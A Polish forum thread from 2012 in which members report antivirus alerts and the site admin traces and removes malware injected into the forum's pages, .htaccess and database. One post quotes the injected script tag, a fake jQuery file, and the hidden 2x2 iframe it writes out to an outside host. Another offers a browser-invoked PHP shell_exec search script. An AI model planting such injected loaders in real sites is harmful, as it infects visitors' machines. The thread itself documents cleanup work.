co za syf na tym forum?

popeye · Post by **popeye** » 11 Jul 2012 14:37

Czy wam też anty wirus pokazuje cały czas info o złośliwym oprogramowaniu?

chmiel · Post by **chmiel** » 11 Jul 2012 16:27

Mi nie.
Mam antywisrusa McAfee

pokrzewka · Post by **pokrzewka** » 11 Jul 2012 18:43

w pracy mam kasperskiego, pisze, że zagrożenie i nie można wejść na stronę

Post by **behem0th** » 11 Jul 2012 23:29

a co pokazuje dokladnie?

nie wiem co tu zlosliwego moglo sie podlaczyc..

Post by **behem0th** » 12 Jul 2012 00:07

fucktycznie cos sie dokleilo, usunelem, ale podobno wraca jak bumerang. ;)
dawac znak jak nie ok, ale najpierw wyczysccie cache.

leoheart · Post by **leoheart** » 12 Jul 2012 14:14

cały czas wyskakuje

URL: http://otwock.org.pl//relacje/2002.korsy...
Proces: file://C:\Program Files\Mozilla Firefox\...
Infekcja: html:Iframe-inf

Post by **behem0th** » 12 Jul 2012 15:18

a teraz? ;)
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie

Guest · Post by **Guest** » 13 Jul 2012 09:23

behem0th wrote:a teraz?
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie

Chyba wszedzie w forum z automatu dokleja to:

Code: Select all

tuz za <body> i </body>

script type="text/javascript" language="javascript" src="http://otwock.org.pl//relacje/2002.korsyka/arlesimages/jquery.ui.accordion.min.js" ></script

ten psudo scrypt jquery generuje ten iframe:

Code: Select all

document.write('iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe');

Sciagnij wszystko na swoj komp i przeszukaj na ktorys z wystepujacych tu stringow (np "accordion") . Zrob dump bazy i tez przeszukaj

chmiel · Post by **chmiel** » 13 Jul 2012 09:37

Hakier LUN4T1C0 atakuje !

Guest · Post by **Guest** » 13 Jul 2012 09:48

Anonymous wrote:
behem0th wrote:a teraz?
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
Albo zrób tak:

do pliku np szukaj_intruza.php wstaw kod:
Code: Select all
TAG PRE
<?php

$cmd = 'find . -type f -name "*.php" -exec grep -H -A2 -B2 "accordion" {} \;';
echo $cmd;
echo shell_exec($cmd);
i wywolaj go z przegladarki - byc moze zadziala - przeszukuje pliki php na string "accordion" Jesli chcesz przeszukac inne typy zamien -name "*.php" na np -name "*.tpl" itd albo usun wogole wtedy bedzie szukac wszystko

Na wyjsciu bedziesz mial nazwe pliku, nr linii i fragment kodu w kontekscie 2 linii przed i za znalezionym fragmentem

Guest · Post by **Guest** » 13 Jul 2012 09:49

echo $cmd; mozna wywalic jest zbedne

Post by **behem0th** » 13 Jul 2012 09:59

co za ch.. drugiego sajta tez przyatakowalo.

wcina sie w .httaccess, pliki php i baze tyle ze jak to usune to znow zaraz sie pojawi pewnie..

dzieki za pomoc, pewnie bedzie potrzebna docelowo ;)

Giant Mike · Post by **Giant Mike** » 13 Jul 2012 12:53

behem0th wrote:co za ch.. drugiego sajta tez przyatakowalo.

wcina sie w .httaccess, pliki php i baze tyle ze jak to usune to znow zaraz sie pojawi pewnie..

dzieki za pomoc, pewnie bedzie potrzebna docelowo

hmmmm ... a te pliki nie powinny być RO ?

Michał

Post by **behem0th** » 13 Jul 2012 18:42

atrybuty sa ok, podobno trojan przechwytuje hasla i wchodzi jako wlasciciel, ostatnio mialem infekcje jakiegos syfu wiec by sie zgadzalo, jak tylko sobie przypmne i zmienie na nowe to bedzie dobrze. dorwalem logi, ftpa bedzie czystka :)

Post by **behem0th** » 13 Jul 2012 20:21

powinno byc ok